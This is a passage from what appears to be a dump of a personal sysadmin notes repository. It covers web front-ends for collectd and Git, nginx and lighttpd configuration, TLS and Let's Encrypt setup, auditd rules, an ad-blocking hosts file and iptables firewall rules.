| try_files $uri $uri/ =404; 150 | } 151 | location /collection3 { 152 | return 301 /collection3/bin/index.cgi; 153 | } 154 | } 155 | } 156 | 157 | Lighttpd server configuration 158 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 159 | :: 160 | 161 | # Note: if the config already enables mod_alias, you must remove it from 162 | # the next line 163 | server.modules += ( "mod_alias" "mod_cgi" ) 164 | alias.url += ( "/collection3" => "/usr/share/doc/collectd-core/examples/collection3/" ) 165 | $HTTP["url"] =~ "^/collection3" { 166 | cgi.assign = ( ".cgi" => "/usr/bin/perl" ) 167 | } 168 | index-file.names += ( "bin/index.cgi" ) 169 | 170 | 171 | Collectd Graph Panel front-end 172 | ------------------------------ 173 | 174 | CGP (Collectd Graph Panel) is a better front-end than Collection3. It is 175 | written in PHP. To install it, you just need to download latest release from 176 | https://github.com/pommi/CGP/releases in a folder and to configure your web 177 | server accordingly. 178 | 179 | Official website: http://pommi.nethuis.nl/category/cgp/ 180 | 181 | To enable ``jsrrdgraph`` (to have Javascript-rendered graphs in which you can 182 | navigate with your mouse), you just need to enable the ``canvas`` mode. This 183 | is done by creating ``conf/config.local.php`` with:: 184 | 185 | .git) 24 | $projectroot = "/home/git"; 25 | 26 | # directory to use for temp files 27 | $git_temp = "/tmp"; 28 | 29 | # target of the home link on top of all pages 30 | #$home_link = $my_uri || "/"; 31 | 32 | # html text to include at home page 33 | #$home_text = "indextext.html"; 34 | 35 | # file with project list; by default, simply scan the projectroot dir. 36 | #$projects_list = $projectroot; 37 | 38 | # stylesheet to use 39 | #@stylesheets = ("static/gitweb.css"); 40 | 41 | # javascript code for gitweb 42 | #$javascript = "static/gitweb.js"; 43 | 44 | # logo to use 45 | #$logo = "static/git-logo.png"; 46 | #$logo_url = "http://localhost/git"; 47 | #$logo_label = "Localhost Git Repositories"; 48 | 49 | # the 'favicon' 50 | #$favicon = "static/git-favicon.png"; 51 | 52 | # git-diff-tree(1) options to use for generated patches 53 | #@diff_opts = ("-M"); 54 | @diff_opts = (); 55 | 56 | # This prevents gitweb to show hidden repositories 57 | #$export_ok = "git-daemon-export-ok"; 58 | #$strict_export = 1; 59 | 60 | # This lets it make the URLs you see in the header 61 | #@git_base_url_list = ( 'git://localhost/git' ); 62 | 63 | # Features: syntax highlighting and blame view 64 | $feature{'highlight'}{'default'} = [1]; 65 | $feature{'blame'}{'default'} = [1]; 66 | 67 | 68 | Apache configuration 69 | -------------------- 70 | :: 71 | 72 | 73 | ServerName localhost 74 | 75 | SetEnv GIT_PROJECT_ROOT /home/git 76 | SetEnv GIT_HTTP_EXPORT_ALL 77 | 78 | AliasMatch ^/git/(.*/objects/[0-9a-f]{2}/[0-9a-f]{38})$ /home/git/$1 79 | AliasMatch ^/git/(.*/objects/pack/pack-[0-9a-f]{40}.(pack|idx))$ /home/git/$1 80 | # Remove git-receive-pack in next line to forbid push to this server 81 | ScriptAliasMatch \ 82 | "(?x)^/git/(.*/(HEAD | \ 83 | info/refs | \ 84 | objects/info/[^/]+ | \ 85 | git-(upload|receive)-pack))$" \ 86 | /usr/libexec/git-core/git-http-backend/$1 87 | 88 | ScriptAlias /git/ /usr/share/gitweb/gitweb.cgi/ 89 | Alias /git /usr/share/gitweb 90 | 91 | AddHandler cgi-script .cgi 92 | DirectoryIndex gitweb.cgi 93 | Options +ExecCGI 94 | 95 | AllowOverride None 96 | Order allow,deny 97 | Allow from all 98 | 99 | SetEnv GITWEB_CONFIG /home/git/gitweb.conf 100 | 101 | 102 | 103 | 104 | Nginx configuration 105 | ------------------- 106 | :: 107 | 108 | server { 109 | listen 80 default_server; 110 | listen [::]:80 default_server ipv6only=on; 111 | #root /var/www/...; 112 | # Server name is used in the title of GitWeb pages 113 | server_name localhost; 114 | 115 | location / { 116 | try_files $uri $uri/ /index.html; 117 | } 118 | 119 | # Git over HTTP 120 | location ~ ^/git/.*\.git/objects/([0-9a-f]+/[0-9a-f]+|pack/pack-[0-9a-f]+.(pack|idx))$ { 121 | root /home/git; 122 | } 123 | # Remove git-receive-pack in next line to forbid push to this server 124 | location ~ ^/git/(.*\.git/(HEAD|info/refs|objects/info/.*|git-(upload|receive)-pack))$ { 125 | rewrite ^/git(/.*)$ $1 break; 126 | fastcgi_pass unix:/var/run/fcgiwrap.socket; 127 | fastcgi_param SCRIPT_FILENAME /usr/lib/git-core/git-http-backend; 128 | fastcgi_param PATH_INFO $uri; 129 | fastcgi_param GIT_PROJECT_ROOT /home/git; 130 | fastcgi_param GIT_HTTP_EXPORT_ALL ""; 131 | include fastcgi_params; 132 | } 133 | 134 | # Git web 135 | location /git/static/ { 136 | alias /usr/share/gitweb/static/; 137 | } 138 | location /git/ { 139 | fastcgi_pass unix:/var/run/fcgiwrap.socket; 140 | fastcgi_param SCRIPT_FILENAME /usr/share/gitweb/gitweb.cgi; 141 | fastcgi_param PATH_INFO $uri/git; 142 | fastcgi_param GITWEB_CONFIG /home/git/gitweb.conf; 143 | fastcgi_param GIT_HTTP_EXPORT_ALL ""; 144 | include fastcgi_params; 145 | } 146 | } 147 | 148 | 149 | Tips & Tricks 150 | ------------- 151 | 152 | * Gitweb is written in Perl so to use FastCGI you need to install 153 | ``libcgi-fast-perl``. On Debian:: 154 | 155 | apt-get install libcgi-fast-perl 156 | 157 | * To color files with syntax highlighting, you need to install ``highlight`` 158 | program. On Debian:: 159 | 160 | apt-get install highlight 161 | 162 | 163 | CGit 164 | ---- 165 | 166 | CGit is a fast Git web interface written in C. As there are issues with Debian 167 | packaging (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=515793), you may 168 | need to follow instructions on http://git.zx2c4.com/cgit/tree/README to 169 | download, compile and install the latest release. 170 | 171 | Let's say cgit files are installed in ``/var/www/htdocs/cgit/``. The web server 172 | needs to be configured to serve the static files and the CGI, exactly like 173 | gitweb. Here is an extract of an Nginx configuration file:: 174 | 175 | location ~ ^/cgit\.(png|css)$ { root /var/www/htdocs/cgit/; } 176 | location ~ ^/cgit(/.*) { 177 | fastcgi_pass unix:/var/run/fcgiwrap.socket; 178 | fastcgi_param SCRIPT_FILENAME /var/www/htdocs/cgit/cgit.cgi; 179 | fastcgi_param PATH_INFO $1; 180 | fastcgi_param CGIT_CONFIG /home/git/cgitrc; 181 | include fastcgi_params; 182 | } 183 | 184 | Here is an example of ``/home/git/cgitrc``:: 185 | 186 | # Here are some default values 187 | css=/cgit.css 188 | favicon=/favicon.ico 189 | logo=/cgit.png 190 | root-title=Git repository browser 191 | root-desc=a fast webinterface for the git dscm 192 | 193 | # Global settings 194 | cache-size=1000 195 | enable-commit-graph=1 196 | enable-git-config=1 197 | enable-index-links=1 198 | enable-log-filecount=1 199 | enable-log-linecount=1 200 | max-atom-items=100 201 | max-repo-count=10000 202 | max-stats=year 203 | remove-suffix=1 204 | snapshots=tar.gz tar.bz2 zip 205 | strict-export=git-daemon-export-ok 206 | 207 | # Custom configuration 208 | virtual-root=/cgit 209 | cache-root=/var/cache/cgit 210 | #project-list=/home/git/projects.list 211 | scan-path=/home/git/ 212 | clone-prefix=http://localhost/git/ 213 | readme=README 214 | 215 | # Syntax highlighting 216 | source-filter=/usr/lib/cgit/filters/syntax-highlighting.sh 217 | 218 | To create a cache directory (if it doesn't already exist), run something like:: 219 | 220 | mkdir -p /var/cache/cgit 221 | chown -R www-data: /var/cache/cgit 222 | -------------------------------------------------------------------------------- /etc-server/web/lighttpd.conf: -------------------------------------------------------------------------------- 1 | # This file contains some customizations from the default lighttpd config. 2 | # /etc/lighttpd/lighttpd.conf 3 | # To check the config, run: 4 | # lighttpd -t -f /etc/lighttpd/lighttpd.conf 5 | # 6 | # Documentation: 7 | # http://redmine.lighttpd.net/projects/lighttpd/wiki 8 | 9 | server.document-root = "/srv/http" 10 | server.errorlog = "/var/log/lighttpd/error.log" 11 | server.pid-file = "/var/run/lighttpd.pid" 12 | server.username = "www-data" 13 | server.groupname = "www-data" 14 | 15 | # Listen to localhost 16 | server.bind = "127.0.0.1" 17 | server.port = 80 18 | $SERVER["socket"] == "[::1]:80" {} 19 | -------------------------------------------------------------------------------- /etc-server/web/nginx.conf: -------------------------------------------------------------------------------- 1 | # /etc/nginx/nginx.conf 2 | # This file contains some customizations from the default configuration 3 | 4 | user www-data; 5 | worker_processes 4; 6 | pid /var/run/nginx.pid; 7 | 8 | events { 9 | worker_connections 768; 10 | # multi_accept on; 11 | } 12 | 13 | http { 14 | ## 15 | # Basic Settings 16 | ## 17 | 18 | sendfile on; 19 | tcp_nopush on; 20 | tcp_nodelay on; 21 | keepalive_timeout 65; 22 | types_hash_max_size 2048; 23 | 24 | # Only display "nginx" in Server HTTP header 25 | server_tokens off; 26 | 27 | # server_names_hash_bucket_size 64; 28 | # server_name_in_redirect off; 29 | 30 | include /etc/nginx/mime.types; 31 | default_type application/octet-stream; 32 | 33 | ## 34 | # Logging Settings 35 | ## 36 | 37 | access_log /var/log/nginx/access.log; 38 | error_log /var/log/nginx/error.log; 39 | 40 | ## 41 | # Gzip Settings 42 | ## 43 | 44 | gzip on; 45 | gzip_disable "msie6"; 46 | 47 | # gzip_vary on; 48 | # gzip_proxied any; 49 | # gzip_comp_level 6; 50 | # gzip_buffers 16 8k; 51 | # gzip_http_version 1.1; 52 | # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; 53 | 54 | ## 55 | # Content charset 56 | ## 57 | charset UTF-8; 58 | 59 | ## 60 | # Virtual Host Configs 61 | ## 62 | 63 | include /etc/nginx/conf.d/*.conf; 64 | include /etc/nginx/sites-enabled/*; 65 | 66 | # Example of localhost 67 | server { 68 | listen 127.0.0.1:80 default_server; 69 | listen [::1]:80 default_server ipv6only=on; 70 | server_name localhost; 71 | root /srv/http; 72 | index index.html; 73 | 74 | # Deny anything else than GET/POST 75 | limit_except GET HEAD POST { 76 | deny all; 77 | } 78 | 79 | # Deny access to hidden directories 80 | location ~ /\. { 81 | return 403; 82 | } 83 | 84 | # Allow access to static files 85 | location / { 86 | try_files $uri $uri/ =404; 87 | } 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /etc-server/web/ssl.rst: -------------------------------------------------------------------------------- 1 | SSL configuration on a web server 2 | ================================= 3 | 4 | Many websites describe how to correctly set up a SSL/TLS web server with a 5 | secure configuration. Here is a list of some that I've found: 6 | 7 | * http://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/ 8 | * https://wiki.mozilla.org/Security/Server_Side_TLS 9 | * https://bettercrypto.org/ (with a paper which advices a configuration) 10 | 11 | Here are example configurations for ssl.example.com host with a certificate 12 | signed by StartSSL (https://www.startssl.com/) or Let's encrypt 13 | (https://letsencrypt.org/) or AlwaysOnSSL (https://alwaysonssl.com/). 14 | 15 | Apache:: 16 | 17 | 18 | 19 | ServerName ssl.example.com 20 | SSLEngine on 21 | SSLCertificateFile /etc/ssl/ssl.example.com.crt 22 | SSLCertificateKeyFile /etc/ssl/ssl.example.com.key 23 | SSLCertificateChainFile /etc/ssl/intermediate.pem 24 | SSLCACertificateFile /etc/ssl/certs 25 | SSLProtocol ALL -SSLv2 -SSLv3 26 | SSLHonorCipherOrder On 27 | SSLCipherSuite ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA; 28 | SSLCompression Off 29 | 30 | # Enable this if your want HSTS (recommended, but be careful) 31 | # Header add Strict-Transport-Security "max-age=15768000" 32 | 33 | # OCSP Stapling, only in httpd 2.3.3 and later 34 | SSLUseStapling On 35 | SSLStaplingResponderTimeout 5 36 | SSLStaplingReturnResponderErrors off 37 | SSLStaplingCache shmcb:/var/run/ocsp(128000) 38 | 39 | 40 | 41 | Nginx:: 42 | 43 | server { 44 | listen 443; 45 | server_name ssl.example.com; 46 | ssl on; 47 | # certs sent to the client in SERVER HELLO are concatenated 48 | ssl_certificate /etc/ssl/ssl.example.com_and_intermediates.pem; 49 | ssl_certificate_key /etc/ssl/ssl.example.com.key; 50 | ssl_dhparam /etc/ssl/dhparam.pem; 51 | ssl_session_timeout 10m; 52 | ssl_protocols TLSv1 TLSv1.1 TLSv1.2; 53 | ssl_ciphers ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA; 54 | ssl_prefer_server_ciphers on; 55 | ssl_session_cache shared:SSL:10m; 56 | 57 | # Enable this if your want HSTS (recommended, but be careful) 58 | # add_header Strict-Transport-Security max-age=15768000; 59 | 60 | # OCSP Stapling 61 | # fetch OCSP records from URL in ssl_certificate and cache them 62 | ssl_stapling on; 63 | ssl_stapling_verify on; 64 | # verify chain of trust of OCSP response using Root CA and Intermediate certs 65 | ssl_trusted_certificate /path/to/root_CA_cert_plus_intermediates; 66 | # IP address of the DNS resolver to be used to obtain the IP address of 67 | # the OCSP responder 68 | resolver 127.0.0.1; 69 | } 70 | 71 | To generate the Diffie-Hellman parameters for DHE ciphersuites, use:: 72 | 73 | openssl dhparam -out /etc/ssl/dhparam.pem 4096 74 | 75 | 76 | Testing configuration 77 | --------------------- 78 | 79 | Here are several commands to be used to check a running HTTPS web server. 80 | 81 | Establish an TLS (or SSL) connection:: 82 | 83 | openssl s_client -connect ssl.example.com:443 -servername ssl.example.com -showcerts 84 | 85 | Use a web service, like Qualys' SSL Server Test: 86 | https://www.ssllabs.com/ssltest/ 87 | 88 | This web page helps displays what your browser supports: 89 | https://www.ssllabs.com/ssltest/viewMyClient.html 90 | 91 | 92 | Using Let's Encrypt 93 | ------------------- 94 | 95 | The official Let's Encrypt client (https://github.com/letsencrypt/letsencrypt) 96 | needs to run as root on the server which will use the certificate. Thankfully 97 | there exists other ways of signing certificates: 98 | 99 | * https://github.com/diafygi/letsencrypt-nosudo Let's Encrypt Without Sudo 100 | * https://gethttpsforfree.com/ Get HTTPS for free! (web interface to Let's Encrypt) 101 | 102 | These methods rely on some openssl commands to use an account key. 103 | 104 | * To create an account key and print the associated public key:: 105 | 106 | openssl genrsa 4096 > account.key 107 | openssl rsa -in account.key -pubout 108 | 109 | * To sign what needs to be signed:: 110 | 111 | echo -n 'Content' | openssl dgst -sha256 -hex -sign account.key 112 | 113 | To generate a Certificate Signing Request (CSR) for a domain with X509v3 114 | Subject Alternative Name (SAN), these commands can be used:: 115 | 116 | openssl genrsa 4096 > ssl.example.com.key 117 | openssl req -new -sha256 -key ssl.example.com.key -subj "/" \ 118 | -reqexts SAN -config <(cat /etc/ssl/openssl.cnf 119 | <(printf "[SAN]\nsubjectAltName=DNS:example.com,DNS:ssl.example.com")) 120 | 121 | On some systems the OpenSSL configuration file lie elsewhere, for example in 122 | ``/etc/pki/tls/openssl.cnf`` or in ``/System/Library/OpenSSL/openssl.cnf`` 123 | (Mac OS). 124 | 125 | In order to validate the ownership of a domain, a generated file needs to be 126 | served over HTTP (not HTTPS), which may for example give:: 127 | 128 | $ curl http://ssl.example.com/.well-known/acme-challenge/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ 129 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg 130 | 131 | To do this on a live (production system), a possible way consists in serving 132 | /.well-known/acme-challenge from a specific directory, where an administrator 133 | will put the needed files. With nginx, a configuration can be:: 134 | 135 | server { 136 | listen 127.0.0.1:80; 137 | listen [::1]:80; 138 | server_name ssl.example.com; 139 | 140 | # Let's encrypt 141 | location /.well-known/acme-challenge { 142 | alias /var/acme-challenge/ssl.example.com; 143 | } 144 | location / { 145 | rewrite ^(.*) https://ssl.example.com$1 permanent; 146 | } 147 | } 148 | 149 | Then an admin can put the files needed for Let's Encrypt to verify domain 150 | ownership in directory ``/var/acme-challenge/ssl.example.com/``. 151 | -------------------------------------------------------------------------------- /etc/audit/audit.rules: -------------------------------------------------------------------------------- 1 | # Reload this file with: 2 | # auditctl -D && auditctl -R /etc/audit/audit.rules 3 | # 4 | # Then list rules with: 5 | # auditctl -l 6 | # 7 | # and generate report with: 8 | # aureport -i -k --summary 9 | # 10 | # Documentation: 11 | # - section 6.7.3 of https://www.ssi.gouv.fr/uploads/2015/10/NP_Linux_Configuration.pdf 12 | 13 | # Monitor insmod, rmmod and modprobe 14 | -w /usr/bin/insmod -p x -k audit_modules 15 | -w /usr/bin/modprobe -p x -k audit_modules 16 | -w /usr/bin/rmmod -p x -k audit_modules 17 | -w /sbin/insmod -p x -k audit_modules 18 | -w /sbin/modprobe -p x -k audit_modules 19 | -w /sbin/rmmod -p x -k audit_modules 20 | 21 | # Log modifications in /etc/ 22 | -w /etc/ -p wa -k audit_conf 23 | 24 | # Log mount and unmount operations 25 | -a exit,always -F arch=b32 -S mount -S umount2 -k audit_mount 26 | -a exit,always -F arch=b64 -S mount -S umount2 -k audit_mount 27 | 28 | # Log suspicious x86 syscalls 29 | -a exit,always -F arch=b32 -S ioperm -S modify_ldt -k audit_syscall 30 | -a exit,always -F arch=b64 -S ioperm -S modify_ldt -k audit_syscall 31 | 32 | # Log uncommon syscalls which need some close monitoring 33 | -a exit,always -F arch=b32 -S get_kernel_syms -S ptrace -S prctl -k audit_syscall 34 | -a exit,always -F arch=b32 -S init_module -S finit_module -k audit_syscall 35 | -a exit,always -F arch=b32 -S perf_event_open -k audit_syscall 36 | -a exit,always -F arch=b64 -S get_kernel_syms -S ptrace -S prctl -k audit_syscall 37 | -a exit,always -F arch=b64 -S init_module -S finit_module -k audit_syscall 38 | -a exit,always -F arch=b64 -S perf_event_open -k audit_syscall 39 | 40 | # Lock auditd configuration 41 | -e 2 42 | -------------------------------------------------------------------------------- /etc/hosts: -------------------------------------------------------------------------------- 1 | # 2 | # /etc/hosts: static lookup table for host names 3 | # 4 | 5 | # 6 | 127.0.0.1 localhost.localdomain localhost 7 | # MyHostName should be what's in /etc/hostname 8 | 127.0.1.1 MyHostName 9 | ::1 localhost.localdomain localhost ip6-localhost ip6-loopback 10 | 11 | # Speed up non-numeric iptables listing 12 | # For IPv4 there are some PTR records in DNS with mcast.net subdomains 13 | 224.0.0.0 ip4-mcast224 14 | 224.0.0.1 ip4-allsystems 15 | 224.0.0.2 ip4-allrouters 16 | 224.0.0.22 ip4-igmp 17 | 224.0.0.251 ip4-mdns 18 | 239.0.0.0 ip4-mcast239 19 | 255.255.255.255 ip4-broadcast 20 | 21 | fe00::0 ip6-localnet 22 | ff00::0 ip6-mcastprefix 23 | ff02::1 ip6-allnodes 24 | ff02::2 ip6-allrouters 25 | ff02::fb ip6-mdns 26 | 27 | # Blacklist some advertisement providers with DNS 28 | # To follow every DNS query on Linux, you can use a command such as: 29 | # tshark -n udp dst port 53 30 | 0.0.0.1 ad.doubleclick.net 31 | 0.0.0.1 googleads.g.doubleclick.net 32 | 0.0.0.1 pubads.g.doubleclick.net 33 | 0.0.0.1 pagead2.googlesyndication.com 34 | 0.0.0.1 pixel.quantserve.com 35 | 36 | # See also https://github.com/StevenBlack/hosts to block ads using /etc/hosts 37 | -------------------------------------------------------------------------------- /etc/index.rst: -------------------------------------------------------------------------------- 1 | ``/etc`` 2 | ======== 3 | 4 | .. toctree:: 5 | :maxdepth: 1 6 | :glob: 7 | 8 | ** 9 | -------------------------------------------------------------------------------- /etc/iptables/empty.rules: -------------------------------------------------------------------------------- 1 | # Empty iptables rule file 2 | *filter 3 | :INPUT ACCEPT [0:0] 4 | :FORWARD ACCEPT [0:0] 5 | :OUTPUT ACCEPT [0:0] 6 | COMMIT 7 | -------------------------------------------------------------------------------- /etc/iptables/iptables-desktop.rules: -------------------------------------------------------------------------------- 1 | # This file contains a basic set of rules to apply for an Internet client. 2 | # Please adapt these rules to make them match what you use. 3 | 4 | 5 | *filter 6 | :INPUT DROP [0:0] 7 | :FORWARD DROP [0:0] 8 | :OUTPUT DROP [0:0] 9 | 10 | # IPv6: Disable processing of any RH0 packet to prevent ping-pong 11 | -6 -A INPUT -m rt --rt-type 0 -j DROP 12 | -6 -A FORWARD -m rt --rt-type 0 -j DROP 13 | -6 -A OUTPUT -m rt --rt-type 0 -j DROP 14 | 15 | ############################################################################## 16 | # INPUT filters 17 | 18 | # Trust local loopback 19 | -A INPUT -i lo -j ACCEPT 20 | 21 | # Broadcast pings are allowed and produce replies in invalid states 22 | -4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -m limit --limit 2/sec -j ACCEPT 23 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -m limit --limit 2/sec -j ACCEPT 24 | 25 | # Drop invalid packets 26 | -A INPUT -m conntrack --ctstate INVALID -j DROP 27 | 28 | # Drop DHCP requests but accept answers 29 | -4 -A INPUT -p udp -m udp --sport 68 --dport 67 -j DROP 30 | -4 -A INPUT -p udp -m udp --sport 67 --dport 68 -j ACCEPT 31 | 32 | # Drop DHCPv6 requests but accept answers 33 | -6 -A INPUT -p udp -m udp --sport 547 --dport 546 -j DROP 34 | -6 -A INPUT -p udp -m udp --sport 546 --dport 547 -j ACCEPT 35 | 36 | # port range is in /proc/sys/net/ipv4/ip_local_port_range 37 | # If conntrack is not available (old kernel), use -m state --state instead 38 | -A INPUT -p tcp -m tcp --dport 32768:61000 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT 39 | -A INPUT -p udp -m udp --dport 32768:61000 -m conntrack --ctstate ESTABLISHED -j ACCEPT 40 | # Most DNS resolvers (BIND, PowerDNS, ...) use their own ports numbers 41 | -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -j ACCEPT 42 | 43 | # If conntrack module is not available, state module doesn't work well for IPv6 44 | # so use these rules instead 45 | #-6 -A INPUT -p tcp -m tcp --dport 32768:61000 ! --syn -j ACCEPT 46 | #-6 -A INPUT -p udp -m udp --dport 32768:61000 -j ACCEPT 47 | 48 | 49 | # ICMPv4 echo reply, dest unreachable, echo request, time exceeded, parameter problem 50 | -4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -j ACCEPT 51 | -4 -A INPUT -p icmp -m icmp --icmp-type 3 -j ACCEPT 52 | -4 -A INPUT -p icmp -m icmp --icmp-type 8/0 -j ACCEPT 53 | -4 -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT 54 | -4 -A INPUT -p icmp -m icmp --icmp-type 12 -j ACCEPT 55 | 56 | # ICMPv6 dest unreachable, packet too big, time exceeded, parameter problem 57 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 1 -j ACCEPT 58 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 2 -j ACCEPT 59 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 3 -j ACCEPT 60 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 4 -j ACCEPT 61 | # ICMPv6 echo request, echo reply 62 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 128/0 -j ACCEPT 63 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -j ACCEPT 64 | # IPv6 Multicast Listener Query, Report and Done 65 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 130/0 -j ACCEPT 66 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 131/0 -j ACCEPT 67 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 132/0 -j ACCEPT 68 | # Neighbor Discovery Protocol: RS, RA, NS, NA 69 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 133/0 -j ACCEPT 70 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 134/0 -j ACCEPT 71 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 135/0 -j ACCEPT 72 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 136/0 -j ACCEPT 73 | 74 | 75 | # Accept SSH, HTTP, HTTPS, ... (activate only the ones needed) 76 | #-A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT 77 | 78 | # Accept NTP 79 | -A INPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT 80 | 81 | 82 | # Accept IGMP (multicast) and mDNS 83 | # 224.0.0.1 = to all hosts 84 | # 224.0.0.2 = to all routers 85 | # 224.0.0.22 = IGMPv3 86 | # 224.0.0.251 = mDNS 87 | # TODO: use -m pkttype --pkt-type multicast -j ACCEPT ? 88 | -4 -A INPUT -d 224.0.0.1/32 -p igmp -j ACCEPT 89 | -4 -A INPUT -d 224.0.0.2/32 -p igmp -j ACCEPT 90 | -4 -A INPUT -d 224.0.0.22/32 -p igmp -j ACCEPT 91 | -4 -A INPUT -d 224.0.0.251/32 -p igmp -j ACCEPT 92 | -4 -A INPUT -d 224.0.0.251/32 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT 93 | -6 -A INPUT -d ff02::fb/128 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT 94 | 95 | # Accept NetBios 96 | -A INPUT -p tcp -m multiport --dports 139,445 -j ACCEPT 97 | -A INPUT -p udp -m udp --sport 137:138 --dport 137:138 -j ACCEPT 98 | 99 | # Silently drop some LAN discovery services 100 | -4 -A INPUT -p udp -m udp --sport 3483 --dport 3483 -m comment --comment "Slim Devices" -j DROP 101 | -4 -A INPUT -p udp -m udp --sport 17500 --dport 17500 -m comment --comment "DropBox" -j DROP 102 | 103 | # Silently drop unsollicited broadcast and multicast 104 | -A INPUT -m pkttype --pkt-type broadcast -j DROP 105 | -A INPUT -m pkttype --pkt-type multicast -j DROP 106 | # This rule is still here to really avoid rejecting an IPv4 broadcast 107 | -4 -A INPUT -d 255.255.255.255/32 -j DROP 108 | 109 | # Log to NetFilter, so that logs don't fills up and debugging is quick 110 | #-A INPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[IN DROP] " 111 | -A INPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 112 | 113 | # Reject packet, with some stats in iptables -nvL and ip6tables -nvL 114 | -A INPUT -p tcp -j REJECT --reject-with tcp-reset 115 | -4 -A INPUT -p udp -j REJECT --reject-with icmp-port-unreachable 116 | -6 -A INPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 117 | -4 -A INPUT -p icmp -j DROP 118 | -6 -A INPUT -p ipv6-icmp -j DROP 119 | -4 -A INPUT -j REJECT --reject-with icmp-proto-unreachable 120 | -6 -A INPUT -j REJECT 121 | 122 | 123 | ############################################################################## 124 | # OUTPUT filters 125 | 126 | # These filters respect the symmetry of INPUT filters 127 | 128 | -A OUTPUT -o lo -j ACCEPT 129 | -4 -A OUTPUT -p udp -m udp --sport 67 --dport 68 -j DROP 130 | -4 -A OUTPUT -p udp -m udp --sport 68 --dport 67 -j ACCEPT 131 | -4 -A OUTPUT -p icmp -j ACCEPT 132 | -6 -A OUTPUT -p ipv6-icmp -j ACCEPT 133 | 134 | # Accept TCP reset and FIN+ACK 135 | -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j ACCEPT 136 | -A OUTPUT -p tcp -m tcp --tcp-flags FIN,ACK FIN,ACK -j ACCEPT 137 | 138 | -4 -A OUTPUT -d 255.255.255.255/32 -j DROP 139 | -4 -A OUTPUT -m conntrack --ctstate INVALID -j DROP 140 | 141 | # Refuse to send emails directly through SMTP. Use SMTPS (port 587) to send mail. 142 | -A OUTPUT -p tcp -m tcp --dport 25 -j REJECT 143 | 144 | -A OUTPUT -p tcp -m tcp --sport 32768:61000 -j ACCEPT 145 | -A OUTPUT -p udp -m udp --sport 32768:61000 -j ACCEPT 146 | -A OUTPUT -p udp -m udp --sport 1024:65535 --dport 53 -j ACCEPT 147 | 148 | #-A OUTPUT -p tcp -m multiport --sports 22,80,443 -j ACCEPT 149 | -A OUTPUT -p udp -m udp --dport 123 -j ACCEPT 150 | 151 | -4 -A OUTPUT -d 224.0.0.1/32 -p igmp -j ACCEPT 152 | -4 -A OUTPUT -d 224.0.0.2/32 -p igmp -j ACCEPT 153 | -4 -A OUTPUT -d 224.0.0.22/32 -p igmp -j ACCEPT 154 | -4 -A OUTPUT -d 224.0.0.251/32 -p igmp -j ACCEPT 155 | -4 -A OUTPUT -d 224.0.0.251/32 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT 156 | -6 -A OUTPUT -d ff02::fb/128 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT 157 | 158 | #-A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[OUT DROP] " 159 | -A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 160 | 161 | # Reject other packets, with some stats in iptables -nvL and ip6tables -nvL 162 | -A OUTPUT -p tcp -j REJECT --reject-with tcp-reset 163 | -4 -A OUTPUT -p udp -j REJECT --reject-with icmp-port-unreachable 164 | -6 -A OUTPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 165 | -4 -A OUTPUT -j REJECT --reject-with icmp-proto-unreachable 166 | -6 -A OUTPUT -j REJECT 167 | 168 | COMMIT 169 | -------------------------------------------------------------------------------- /etc/iptables/iptables-server.rules: -------------------------------------------------------------------------------- 1 | # This file contains a basic set of rules to apply for an Internet server. 2 | # Please adapt these rules to make them match what you use. 3 | 4 | 5 | *filter 6 | :INPUT DROP [0:0] 7 | :FORWARD DROP [0:0] 8 | :OUTPUT DROP [0:0] 9 | 10 | # IPv6: Disable processing of any 